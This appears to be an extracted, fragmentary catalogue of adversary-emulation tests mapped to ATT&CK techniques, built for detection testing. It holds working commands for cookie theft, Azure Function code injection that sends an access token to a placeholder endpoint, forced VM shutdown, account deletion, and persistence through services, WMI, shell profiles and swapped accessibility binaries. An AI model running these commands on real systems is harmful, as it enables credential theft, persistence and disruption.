For instance, only with Administrator right, you can see the process description of McAffee processes. Hence, it is better to use get-process | ?{$_.ProcessName -like "*"},
if you know the name of those processes.
ps aux | egrep 'Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'
Description: Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
ps aux | egrep 'falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'
Description: Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
Description: Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
Description: Discovery of an installed Sysinternals Sysmon service using driver altitude (even if the name is changed).
when sucessfully executed, the test is going to display sysmon driver instance if it is installed.
Description: Discovery of installed antivirus products via Get-CimInstance and Get-WmiObject cmdlets of powershell.
when sucessfully executed, information about installed AV software is displayed..
Security Software Discovery - Windows Defender Enumeration
Get-Service WinDefend #check the service state of Windows Defender Get-MpComputerStatus #provides the current status of security solution elements, including Anti-Spyware, Antivirus, LoavProtection, Real-time protection, etc Get-MpThreat #threats details that have been detected using MS Defender
Description: Windows Defender Enumeration via different built-in windows native tools.
when sucessfully executed, information about windows defender is displayed.
Description: Enumerates windows firewall to retrieves firewall rules from the target computer.
when sucessfully executed, details of windows firewall is displayed.
Description: In this test, a WMIC command is used to probe the local Windows system for the configuration of Windows Defender's exclusions. This command targets the MSFT_MpPreference
class within the Windows Management Instrumentation (WMI) namespace, allowing the retrieval of critical settings such as disabled real-time monitoring and specified
exclusion paths, file extensions, and processes. Attackers might use this approach to understand what is excluded from antivirus scans, enabling further exploitation.
T1518 - Software Discovery
Find and Display Internet Explorer Browser Version
Description: Query the registry to determine the version of internet explorer installed on the system.
Upon execution, version information about internet explorer will be displayed.
Description: Query the registry to determine software and versions installed on the system. Upon execution a table of
software name and version information will be displayed.
Description: Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
Description: Upon successful execution, this test will enumerate all resources that are contained within a valid Azure subscription.
The resources enumerated will display on screen, as well as several csv files and folders will be output to a specified directory, listing what resources were discovered by the script.
See https://dev.to/cheahengsoon/enumerating-subscription-information-with-microburst-35a1
Prereq: The Get-AzDomainInfo script must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\Get-AzDomainInfo.ps1"){exit 0} else {exit 1}
$allowSharedKeyAccess = az storage account show --name "storage_account_name_example" --query "allowSharedKeyAccess"
if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { $connectionString = az storage account show-connection-string --name "storage_account_name_example" --query connectionString --output tsv
if ($LASTEXITCODE -eq 0) { # Upload new blob version if download of existing blob succeeded az storage blob upload --connection-string $connectionString --container-name "container_name_example" --name "blob_example" --file "$env:temp/T1528_function_code.zip" --overwrite true } else { Write-Output "Download original function code failed." exit 1 } }
Description: This test injects code into an Azure Function (RCE).
Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
Similar to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token", the depicted code injection scenario tampers the source code of Azure Functions to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance. In this case, the prepared zip file (underlying package for a Function) is expected to contain the tampered function presented in src/code_to_insert.py. Note that the endpoint https://changeme.net needs to be adapted in your packed function code.
Note:
- The Azure Function modified in this test must be hosted via Azure Blob storage (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
- For Function code upload to Azure Functions that are hosted via Azure Files in a File Share, refer to T1528 "Azure - Functions code upload - Functions code injection to retrieve the Functions identity access token".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
$insertContent = Get-Content -Path "$T1528/src/code_to_insert.py" -Raw # Load the content of the insert file
$content = Get-Content -Path $tmpFunctionCode -Raw # Inject code to file $content = $insertContent + "`n" + $content # Insert the new code at the beginning $content | Set-Content -Path $tmpFunctionCode # Write the modified content to the file
# Upload file to file share az storage file upload --account-name "storage_account_name_example" --share-name "file_share_name_example" -p "site/wwwroot/function_app.py" --source $tmpFunctionCode --only-show-errors if ($LASTEXITCODE -ne 0) { Write-Output "Function code upload failed." exit 1 } Write-Output "Uploaded the tampered file" } elseif ("insert_code" -eq "replace_file") { az storage file upload --account-name "storage_account_name_example" --share-name "file_share_name_example" -p "site/wwwroot/function_app.py" --source "$T1528/src/code_to_insert.py" --only-show-errors if ($LASTEXITCODE -ne 0) { Write-Output "Function code upload failed." exit 1 } Write-Output "Uploaded the tampered file" } else { Write-Output "Please choose a valid execution_option" exit 1 } } else { Write-Output "Download original function code failed." exit 1 } }
Description: This test injects code into an Azure Function (RCE) to perform Subscription Privilege Escalation by retrieving the identity access token of an Azure functions instance.
Attack idea/reference: https://orca.security/resources/blog/azure-shared-key-authorization-exploitation/
Once executed, the "https://changeme" will retrieve the access token when the function app is executed on behalf of the tenant. The function may be triggered manually from authorized people, triggered in regular intervals, or in various other ways. The access token can then be used to perform further attack steps with the permissions that the function app holds (e.g. listening virtual machines).
Note:
- The Azure Function modified in this test must be hosted via Azure Files in a File Share (Info on storage considerations for Azure Function: https://learn.microsoft.com/en-us/azure/azure-functions/storage-considerations).
- For Function code upload to Azure Functions that are hosted via Azure Blob storage, refer to T1528 "Azure - Functions code upload - Functions code injection via Blob upload".
- The required input fields can be retrieved in a reconnaissance step in test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". The code of function apps may be inspected and prepared from the result of test T1530 "Azure - Dump Azure Storage Account Objects via Azure CLI".
- Important: Change the https://changeme.net in code_to_insert_path to a self-controlled endpoint. This endpoint can be hosted e.g. as request bin via Pipedream to display the body of incoming POST requests.
- The default injected code to retrieve the access token can be replaced by arbitrary other code. In this case: Replace the code defined in code_to_insert_path
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
Execution options: Defined by the input field execution_option
- insert_code: This option (1) downloads the existing funciton code into a tmp file, (2) injects the code from code_to_insert_path at the beginning of the file, and (3) uploads the tampered file to the targeted Azure Function code (Azure File Share File).
- replace_file: This option uploads the function code defined in code_to_insert_path to the targeted Azure Function code (Azure File Share File).
if ($LASTEXITCODE -eq 0) { Write-Output "Uploaded original version of function code."
# Delete tmp original f file if upload succeeded if ("insert_code" -eq "insert_code") { $tmpFunctionCode = Join-Path $env:temp/ ("T1528_tmp_to_inject_" + $tmpOriginalFileName) Remove-Item -Path $tmpFunctionCode -Force -erroraction silentlycontinue Write-Output "Deleted tmp file: $($tmpFunctionCode)" }
# Delete tmp original file Remove-Item -Path $tmpOriginalFunctionCode -Force -erroraction silentlycontinue Write-Output "Deleted tmp original file: $($tmpOriginalFunctionCode)" } else { Write-Output "Upload original function code failed." }
T1529 - System Shutdown/Reboot
Shutdown System - Windows
shutdown /s /t 1
Description: This test shuts down a Windows system.
T1529 - System Shutdown/Reboot
Restart System - Windows
shutdown /r /t 1
Description: This test restarts a Windows system.
T1529 - System Shutdown/Reboot
Restart System via `shutdown` - FreeBSD/macOS/Linux
shutdown -r now
Description: This test restarts a FreeBSD/macOS/Linux system.
T1529 - System Shutdown/Reboot
Shutdown System via `shutdown` - FreeBSD/macOS/Linux
shutdown -h now
Description: This test shuts down a FreeBSD/macOS/Linux system using a halt.
T1529 - System Shutdown/Reboot
Restart System via `reboot` - FreeBSD/macOS/Linux
reboot
Description: This test restarts a FreeBSD/macOS/Linux system via `reboot`.
T1529 - System Shutdown/Reboot
Shutdown System via `halt` - FreeBSD/Linux
halt -p
Description: This test shuts down a FreeBSD/Linux system using `halt`.
T1529 - System Shutdown/Reboot
Reboot System via `halt` - FreeBSD
halt -r
Description: This test restarts a FreeBSD system using `halt`.
T1529 - System Shutdown/Reboot
Reboot System via `halt` - Linux
halt --reboot
Description: This test restarts a Linux system using `halt`.
T1529 - System Shutdown/Reboot
Shutdown System via `poweroff` - FreeBSD/Linux
poweroff
Description: This test shuts down a FreeBSD/Linux system using `poweroff`.
T1529 - System Shutdown/Reboot
Reboot System via `poweroff` - FreeBSD
poweroff -r 3
Description: This test restarts a FreeBSD system using `poweroff`.
T1529 - System Shutdown/Reboot
Reboot System via `poweroff` - Linux
poweroff --reboot
Description: This test restarts a Linux system using `poweroff`.
T1529 - System Shutdown/Reboot
Logoff System - Windows
shutdown /l
Description: This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
Description: In VMWARE ESXi, process names starting with vmx are associated with running VMs. An adversary can use the pkill command to kill all processes with a prefix vmx.
[Reference](https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
ESXi - Avoslocker enumerates VMs and forcefully kills VMs
Description: Avoslocker malware has inbuilt functionality to enumerate the VM instances and uses the esxcli command to forcefully power off them.
[Reference](https://blogs.vmware.com/security/2022/02/avoslocker-modern-linux-ransomware-threats.html)
Prereq: Check if plink is available.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
ESXi - vim-cmd Used to Power Off VMs
echo "" | "..\ExternalPayloads\plink.exe" -batch "atomic.local" -ssh -l root -pw "password" "for i in `vim-cmd vmsvc/getallvms | awk 'NR>1 {print $1}'`; do vim-cmd vmsvc/power.off $i & done"
Description: Adversaries may power off VMs to facilitate the deployment of ransomware payloads.
[Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#power%20off%20vm)
Prereq: Check if we have plink
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1529 - System Shutdown/Reboot
Abuse of Linux Magic System Request Key for Reboot
echo "b" > /proc/sysrq-trigger
Description: adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can forced to reboot.
if ($allowSharedKeyAccess -eq "false") { # $allowSharedKeyAccess could be true or null Write-Output "Shared key access is disabled for this storage account." } else { Write-Output "Fetching all blobs from container $($row.ContainerName) in storage account $($row.StorageAccountName) ..." $connectionString = az storage account show-connection-string --name $row.StorageAccountName --resource-group $row.ResourceGroup --query connectionString --output tsv
Description: This test dumps the content of the storage account objects present in the file defined in file_shares_csv_file_path. Note that this file is created in the atomic test T1619 "Azure - Enumerate Storage Account Objects via Key-based authentication using Azure CLI". When created manually, it must contain the columns "ResourceGroup","StorageAccountName", "FileShareName", "ContainerName", "BlobName".
Requirements:
- The test is intended to be executed in interactive mode (with -Interactive parameter) in order to complete the az login command when MFA is required.
- The EntraID user must have the role "Storage Account Contributor", or a role with similar permissions.
net user AtomicAdministrator User2ChangePW! /add net.exe user AtomicAdministrator HuHuHUHoHo283283@dJD
Description: Changes the user password to hinder access attempts. Seen in use by LockerGoga. Upon execution, log into the user account "AtomicAdministrator" with
the password "HuHuHUHoHo283283".
Cleanup:
net.exe user AtomicAdministrator /delete >nul 2>&1
T1531 - Account Access Removal
Delete User - Windows
net user AtomicUser User2DeletePW! /add net.exe user AtomicUser /delete
Description: Deletes a user account to prevent access. Upon execution, run the command "net user" to verify that the new "AtomicUser" account was deleted.
T1531 - Account Access Removal
Remove Account From Domain Admin Group
$PWord = ConvertTo-SecureString -String password -AsPlainText -Force $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList domain\super_user, $PWord if((Get-ADUser remove_user -Properties memberof).memberof -like "CN=Domain Admins*"){ Remove-ADGroupMember -Identity "Domain Admins" -Members remove_user -Credential $Credential -Confirm:$False } else{ write-host "Error - Make sure remove_user is in the domain admins group" -foregroundcolor Red }
Description: This test will remove an account from the domain admins group
Prereq: Requires the Active Directory module for powershell to be installed.
Description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
Prereq: Check if AzureAD PowerShell module is installed
Get-InstalledModule -Name AzureAD
Prereq: Check if AzureAD PowerShell module is installed
Update the input arguments so the userprincipalname value is accurate for your environment
Cleanup:
N/A
T1531 - Account Access Removal
Azure AD - Delete user via Azure CLI
az login $userprincipalname = "atomicredteam@yourdomain.com" az ad user delete --id $userprincipalname
Description: Deletes a user in Azure AD. Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (excluding changed credentials) to remove access to accounts.
Prereq: Check if Azure CLI is installed and install manually
az account list
Prereq: Check if Azure CLI is installed and install via PowerShell
az account list
Prereq: Update the userprincipalname to meet your requirements
Update the input arguments so the userprincipalname value is accurate for your environment
Description: This test queries Firefox's cookies.sqlite database to steal the cookie data contained within it, similar to Zloader/Zbot's cookie theft function.
Note: If Firefox is running, the process will be killed to ensure that the DB file isn't locked.
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
Prereq: Sqlite3 must exist at (..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe)
if (Test-Path "..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
Description: This test queries Chrome's SQLite database to steal the encrypted cookie data, designed to function similarly to Zloader/Zbot's cookie theft function.
Once an adversary obtains the encrypted cookie info, they could go on to decrypt the encrypted value, potentially allowing for session theft.
Note: If Chrome is running, the process will be killed to ensure that the DB file isn't locked.
See https://www.malwarebytes.com/resources/files/2020/05/the-silent-night-zloader-zbot_final.pdf.
Prereq: Sqlite3 must exist at (..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe)
if (Test-Path "..\ExternalPayloads\sqlite-tools-win32-x86-3380200\sqlite3.exe") {exit 0} else {exit 1}
killall 'Google Chrome' sleep 1 open -a "/Applications/Google Chrome.app/Contents/MacOS/Google Chrome" --args --remote-debugging-port=1337 --remote-allow-origins=http://localhost/ sleep 1 /tmp/WhiteChocolateMacademiaNut/chocolate -d cookies -p 1337
Description: The remote debugging functionality in Chrome can be used by malware for post-exploitation activities to obtain cookies without requiring keychain access. By initiating Chrome with a remote debug port, an attacker can sidestep encryption and employ Chrome's own mechanisms to access cookies.
If successful, this test will output a list of cookies.
Note: Chrome processes will be killed during this test.
See https://posts.specterops.io/hands-in-the-cookie-jar-dumping-cookies-with-chromiums-remote-debugger-port-34c4f468844e
Prereq: Install Go
go version
Prereq: Download and compile WhiteChocolateMacademiaNut
/tmp/WhiteChocolateMacademiaNut/chocolate -h
Cleanup:
rm -rf /tmp/WhiteChocolateMacademiaNut
T1539 - Steal Web Session Cookie
Steal Chrome v127+ cookies via Remote Debugging (Windows)
Description: Chrome v127+ uses app-bound encryption to protect cookies. This test bypasses that protection to obtain the cookies. If successful, the test outputs cookie values to the console.
Note: Will stop any instances of Chrome already running
Adapted from https://embracethered.com/blog/posts/2024/cookie-theft-in-2024-and-what-todo
T1539 - Steal Web Session Cookie
Copy Safari BinaryCookies files using AppleScript
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "/private/tmp"' -e 'set safariFolder to ((path to library folder from user domain as text) & "Containers:com.apple.Safari:Data:Library:Cookies:")' -e 'duplicate file "Cookies.binarycookies" of folder safariFolder to folder destinationFolderPath with replacing' -e 'end tell'
Description: This command will copy Safari BinaryCookies files using AppleScript as seen in Atomic Stealer.
Description: Creates Wpbbin.exe in %systemroot%. This technique can be used for UEFI-based pre-OS boot persistence mechanisms.
- https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c
- http://download.microsoft.com/download/8/a/2/8a2fb72d-9b96-4e2d-a559-4a27cf905a80/windows-platform-binary-table.docx
- https://github.com/tandasat/WPBT-Builder
T1543.002 - Create or Modify System Process: SysV/Systemd Service
Create Systemd Service file, Enable the service , Modify and Reload the service.
echo "#!/bin/bash" > /etc/init.d/T1543.002 echo "### BEGIN INIT INFO" >> /etc/init.d/T1543.002 echo "# Provides : Atomic Test T1543.002" >> /etc/init.d/T1543.002 echo "# Required-Start: \$all" >> /etc/init.d/T1543.002 echo "# Required-Stop : " >> /etc/init.d/T1543.002 echo "# Default-Start: 2 3 4 5" >> /etc/init.d/T1543.002 echo "# Default-Stop: " >> /etc/init.d/T1543.002 echo "# Short Description: Atomic Test for Systemd Service Creation" >> /etc/init.d/T1543.002 echo "### END INIT INFO" >> /etc/init.d/T1543.002 echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBDcmVhdGluZyBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLmNyZWF0aW9uJykK')) \" " >> /etc/init.d/T1543.002 chmod +x /etc/init.d/T1543.002 if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then update-rc.d T1543.002 defaults; elif [ $(cat /etc/os-release | grep -i 'ID="centos"') ]; then chkconfig T1543.002 on ; else echo "Please run this test on Ubnutu , kali OR centos" ; fi systemctl enable T1543.002 systemctl start T1543.002 echo "python3 -c \"import os, base64;exec(base64.b64decode('aW1wb3J0IG9zCm9zLnBvcGVuKCdlY2hvIGF0b21pYyB0ZXN0IGZvciBtb2RpZnlpbmcgYSBTeXN0ZW1kIFNlcnZpY2UgVDE1NDMuMDAyID4gL3RtcC9UMTU0My4wMDIuc3lzdGVtZC5zZXJ2aWNlLm1vZGlmaWNhdGlvbicpCg=='))\"" | sudo tee -a /etc/init.d/T1543.002 systemctl daemon-reload systemctl restart T1543.002
Description: This test creates a systemd service unit file and enables it to autostart on boot. Once service is created and enabled, it also modifies this same service file showcasing both Creation and Modification of system process.
Description: This test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
Description: Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
Description: Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
T1543.003 - Create or Modify System Process: Windows Service
TinyTurla backdoor service w64time
copy "$T1543.003\bin\w64time.dll" %systemroot%\system32\ sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto sc config W64Time DisplayName= "Windows 64 Time" sc description W64Time "Maintain date and time synch on all clients and services in the network" reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f sc start W64Time
Description: It's running Dll as service to emulate the TinyTurla backdoor
[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
Description: Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.
Prereq: Service binary must exist on disk at specified location (T1543.003\bin\AtomicService.exe)
if (Test-Path "T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}
Description: This test will use PowerShell to temporarily modify a service to run an arbitrary executable by changing its binary path and will then revert the binary path change, restoring the service to its original state.
This technique was previously observed through SnapMC's use of Powerspolit's invoke-serviceabuse function.
[Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)
T1546.001 - Event Triggered Execution: Change Default File Association
Change Default File Association
assoc .hta=txtfile
Description: Change Default File Association From cmd.exe of hta to notepad.
Upon successful execution, cmd.exe will change the file association of .hta to notepad.exe.
Description: This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
Cleanup:
reg import %userprofile%\backup.reg del %userprofile%\backup.reg del %SystemRoot%\System32\evilscreensaver.scr
T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription
Persistence via WMI Event Subscription - CommandLineEventConsumer
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
Description: Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af
https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545
T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription
Persistence via WMI Event Subscription - ActiveScriptEventConsumer
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
Description: Run from an administrator powershell window. After running, reboot the victim machine.
After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
Code references
https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
Description: The following Atomic will utilize MOFComp.exe to load a local MOF file.
The Managed Object Format (MOF) compiler parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.
To query for the class: gwmi __eventfilter -namespace root\subscription
A successful execution will add the class to WMI root namespace.
Reference: https://pentestlab.blog/2020/01/21/persistence-wmi-event-subscription/ and https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/.
Prereq: MofComp.exe must exist on disk at specified location (c:\windows\system32\wbem\mofcomp.exe)
if (Test-Path "c:\windows\system32\wbem\mofcomp.exe") { exit 0} else { exit 1}
Prereq: MofComp.exe must exist on disk at specified location (T1546.003\src\T1546.003.mof)
if (Test-Path "T1546.003\src\T1546.003.mof") { exit 0} else { exit 1}
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .bash_profile
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.bash_profile
Description: Adds a command to the .bash_profile file of the current user
Cleanup:
head -n '-2' ~/.bash_profile > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bash_profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .bashrc
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.bashrc
Description: Adds a command to the .bashrc file of the current user
Cleanup:
head -n '-2' ~/.bashrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.bashrc
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .shrc
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.shrc
Description: Adds a command to the .shrc file of the current user
Cleanup:
head -n '-2' ~/.shrc > /tmp/T1546.004 mv /tmp/T1546.004 ~/.shrc
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Append to the system shell profile
echo '# Hello from Atomic Red Team T1546.004' >> /etc/profile
Description: An adversary may wish to establish persistence by executing malicious commands from the systems /etc/profile every time "any" user logs in.
Cleanup:
sed -i "s/# Atomic Red Team was here! T1546.004//" /etc/profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Append commands user shell profile
echo '# Atomic Red Team was here... T1546.004' >> ~/.profile
Description: An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the "user" logs in.
Cleanup:
sed -i "s/# Atomic Red Team was here... T1546.004//" ~/.profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
System shell profile scripts
echo '# Atomic Red Team was here... T1546.004' >> /etc/profile.d/bash_completion.sh
Description: An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time "any" user logs in.
Cleanup:
sed -i "s/# Atomic Red Team was here... T1546.004//" /etc/profile.d/bash_completion.sh
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Create/Append to .bash_logout
useradd --create-home --shell /bin/bash art su -l art -c "echo 'echo \"Atomic Red Team was here... T1546.004\" >> /home/art/art.txt' >> /home/art/.bash_logout; exit"
Description: The Bash shell runs ~/.bash_logout "if it exists" to run commands on user logout. An adversary may create or append to a .bash_logout to clear history, start processes etc. Note the ~/.bash_logout is only run if you explicitly exit or log out of an "interactive login shell session" i.e. via the console, SSH, /bin/bash -l or su -l .
This test creates the art user, logs in, creates a .bash_logout which will echo some text into the art.txt file on logout and logs out and the /home/art/art.txt is created.
Cleanup:
userdel -fr art
T1546.005 - Event Triggered Execution: Trap
Trap EXIT
bash -c 'trap "nohup sh $T1546.005/src/echo-art-fish.sh" EXIT'
Description: Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
Cleanup:
rm -f /tmp/art-fish.txt
T1546.005 - Event Triggered Execution: Trap
Trap EXIT (freebsd)
bash -c 'trap "nohup sh $T1546.005/src/echo-art-fish.sh" EXIT'
Description: Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
Prereq: Check if bash is installed.
if [ ! -x "$(command -v bash)" ]; then exit 1; else exit 0; fi;
Description: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
Description: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
Prereq: Check if bash is installed.
if [ ! -x "$(command -v bash)" ]; then exit 1; else exit 0; fi;
Description: You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
Prereq: Helper DLL must exist on disk at specified location (T1546.007\bin\NetshHelper.dll)
if (Test-Path "T1546.007\bin\NetshHelper.dll") { exit 0} else { exit 1}
Description: Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.
Upon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.
Description: Executes code specified in the registry on new user logon session automatically by registration of new AT and modification of configuration value.
This test will register new AT named malware_test with code for cmd.exe and add a configuration value for the code to be run during user logon session.
Description: Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
Description: Replace Magnify.exe (Magnifier binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Magnifier from the Accessibility menu on the login screen.
Description: Replace Narrator.exe (Narrator binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Narrator button from the Accessibility menu on the login screen.
Description: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
Description: Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
Description: Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key.
Once the computer restarted, the DLL will be loaded in multiple processes and write an
'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed succesfully.
Reference: https://skanthak.homepage.t-online.de/appcert.html
Prereq: File to copy must exist on disk at specified location (T1546.009\bin\AtomicTest.dll)
if (Test-Path "T1546.009\bin\AtomicTest.dll") {exit 0} else {exit 1}
Description: AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution,
you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with a message of "Install AppInit Shim DLL was called!" appear.
This will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the
AppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
